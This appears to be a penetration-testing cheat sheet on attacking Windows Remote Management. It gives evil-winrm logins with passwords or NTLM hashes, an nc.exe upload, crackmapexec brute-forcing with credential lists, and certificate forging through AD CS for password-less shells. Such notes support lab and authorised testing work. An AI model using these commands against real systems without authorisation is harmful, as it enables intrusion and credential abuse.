Enable WinRM

We first have to configure our attack machine to work with WinRM as well. We need to enable it and add any "victims" as trusted hosts. From an elevated PowerShell prompt, run the following two commands:

Enable-PSRemoting -Force  Set-Item wsman:\localhost\client\trustedhosts *  

Connecting to WinRM

  • To use evil-winrm to connect to an IPv6 address create an entry inside /etc/hosts setting a domain name to the IPv6 address and connect to that domain.

#evilwinrm : gem install evil-winrm
#gem install evil-winrm
evil-winrm -u Administrator -p 'Password'  -i <IP>/<Domain>
evil-winrm -u <username> -H <Hash> -i <IP>

#winrm commands
upload /home/kali/Tools/Windows/nc.exe

WinRM shell

  • Download the script and make necessary config changes.

  • In cse of an SSL error, change port from 5985 to 5986.

#Script Link:
gem install winrm
ruby winrm_shell.rb

Brute-Force crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

Certificate-based Authentication

We can use certificate-based auth(password-less) by creating certificates signed by the AD CS.

  • Pre-requisites:Access to Active Directory Certificate Services

  • Default location:http://<IP>/certsrv/

  • Script Link:

#Generate Private Key
openssl genrsa -aes256 -out myfile.key 2048

#Certificate signing request
openssl req -new -key myfile.key  -out myfile.csr

#Sign certificate as user. Sign-in to http<IP>/certsrv
#Paste content of myfile.csr into the text field.
#Download base4-encoded certificate.

#Append necessary changes in winrm_shell.rb
conn = 
endpoint: ​''​,  
transport: :ssl,
:client_cert => ​'certnew.cer'​,   ​# from the server  
:client_key => ​'amanda.key'​, # private key  
:no_ssl_peer_verification => ​true)

#To view cert
openssl x509 -in certnew.cer -text

gem install winrm
ruby winrm_shell.rb

Last updated